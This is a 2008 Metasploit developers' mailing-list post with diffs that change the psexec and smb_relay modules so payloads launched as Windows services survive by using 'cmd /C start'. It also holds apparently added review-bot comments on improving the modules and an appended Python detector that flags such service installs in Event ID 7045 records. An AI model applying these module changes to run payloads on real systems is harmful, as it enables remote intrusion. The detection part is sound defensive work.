The problem with running payloads under smb_relay and psexec is that
Windows expects them to be services, which they aren't.  Windows
expects services to respond to calls to start, stop, give a status,
etc., and none of the payloads obviously do that.  Therefore, when we
start a service, Windows asks the application for a status; when it
doesn't get it, it terminates the application.

But the application does run for a few seconds, so the solution is to
simply invoke the application on its own rather than within a service.
Once that's done, the application will be running in memory as a
standalone and the fact that a service started it is not a problem.
At first, I thought this would require building a special launcher
application, but then I remembered Windows already has one.  Simply
change:

NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path

to:

NDR.wstring("cmd /C start %SYSTEMROOT%\\#(unknown)") + # Binary Path

This invokes a command shell which executes the start command.
Windows immediately terminates the cmd shell and returns an error, but
it has already run "start 'payload'", invoking the app in its own
right.

The two main problems I see with this:

1) You now have somewhat of a trigger for IDS (creating services with
bin_paths starting with "cmd /C start" can't be common)
2) It still doesn't clean up after itself.

But, if you find this useful anyway, here are the patches:

--- psexec.rb.old	2008-07-02 17:08:46.000000000 +0000
+++ psexec.rb	2008-07-02 17:09:14.000000000 +0000
@@ -164,7 +164,7 @@
 			NDR.long(0x00000003) + # Start: Demand
 			NDR.long(0x00000000) + # Errors: Ignore
 			
-			NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path
+			NDR.wstring("cmd /C start %SYSTEMROOT%\\#(unknown)") + # Binary Path
 			NDR.long(0) + # LoadOrderGroup
 			NDR.long(0) + # Dependencies
 			NDR.long(0) + # Service Start
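Review bot: the + line changes only the binary path; nothing in this hunk or its context changes how the module handles the result of starting the service, so the start call will still come back with the "service did not respond" error the message describes, and the service entry stays registered afterwards (the "doesn't clean up after itself" point). Suggest a comment on the + line stating that the start error is expected and not a failure, and a follow-up change that deletes the service once the start has returned, so the module removes the record it created.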
--- smb_relay.rb.old	2008-07-02 17:03:16.000000000 +0000
+++ smb_relay.rb	2008-07-02 17:07:32.000000000 +0000
@@ -180,7 +180,7 @@
 			NDR.long(0x00000003) + # Start: Demand
 			NDR.long(0x00000000) + # Errors: Ignore
 			
-			NDR.wstring("%SYSTEMROOT%\\#(unknown)") + # Binary Path
+			NDR.wstring("cmd /C start %SYSTEMROOT%\\#(unknown)") + # Binary Path
 			NDR.long(0) + # LoadOrderGroup
 			NDR.long(0) + # Dependencies
 			NDR.long(0) + # Service Start
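Review bot: this is the identical one-line change already made in psexec.rb, and the surrounding service-creation request (the NDR.long / NDR.wstring sequence) is duplicated verbatim between the two modules; consider moving that request construction into a shared helper so the "cmd /C start" wrapper, and the detection caveat that comes with it, are maintained in one place. One small point on the + line: the path is unquoted, which is fine for the usual %SYSTEMROOT% value, but cmd's start treats a quoted first argument as a window title, so if the path ever needs quoting it must be written as start "" "path".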
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
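An added example, not part of the original post or of the Metasploit modules it patches, for the detection side of point (1) above: a service whose binary path begins with "cmd /C start" is unusual, and on the host it leaves a service-install record (Windows System log Event ID 7045) carrying that image path. The code below runs a small matcher over constructed records in the shape of that event; the field names, sample service names and paths are all made up for the example, and the match rule (cmd or cmd.exe, optionally quoted or with a directory, followed by /C and start, any letter case) is the author's own generalization of the exact string the patch produces.

```python
import re

# Constructed sample records shaped like the fields of Windows System log
# Event ID 7045 ("A service was installed in the system"). All values are
# made up for this example; the field names follow the event's message body.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe",
     "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "QkrTzwLp",
     "ImagePath": "cmd /C start %SYSTEMROOT%\\QkrTzwLp.exe",
     "StartType": "demand start"},
    {"EventID": 7045, "ServiceName": "BackupAgent",
     "ImagePath": '"C:\\Program Files\\Backup\\agent.exe" --service',
     "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Helper",
     "ImagePath": 'C:\\Windows\\System32\\cmd.exe /c start "" C:\\Temp\\h.exe',
     "StartType": "demand start"},
    # A status-change event (7036), not an install; must be ignored.
    {"EventID": 7036, "ServiceName": "Spooler",
     "ImagePath": "", "StartType": ""},
]

# Image path begins with cmd / cmd.exe (optionally quoted, optionally with a
# drive-letter directory) followed by /C and the "start" built-in, in any
# letter case. This is the shape the patched modules register.
CMD_START_RE = re.compile(
    r'^\s*"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/c\s+start\b',
    re.IGNORECASE)


def is_cmd_start_image_path(image_path):
    """True when a service binary path launches its target via cmd /C start."""
    return bool(CMD_START_RE.match(image_path or ""))


def find_cmd_start_services(events):
    """Return the service-install (7045) events whose binary path matches
    the cmd /C start wrapper, as a list of small dicts for reporting."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7045:
            continue
        if is_cmd_start_image_path(ev.get("ImagePath", "")):
            hits.append({"ServiceName": ev["ServiceName"],
                         "ImagePath": ev["ImagePath"],
                         "StartType": ev["StartType"]})
    return hits


if __name__ == "__main__":
    for hit in find_cmd_start_services(SAMPLE_EVENTS):
        print("suspicious service install: %s -> %s (%s)"
              % (hit["ServiceName"], hit["ImagePath"], hit["StartType"]))
```

Run against the constructed records it reports the two cmd-wrapped installs and ignores the ordinary service paths and the non-install event; in a real pipeline the same predicate would be applied to the ImagePath field of exported 7045 events. The "demand start" start type in the flagged records matches the Start: Demand value visible in the hunks, which is a useful secondary field to carry into the alert.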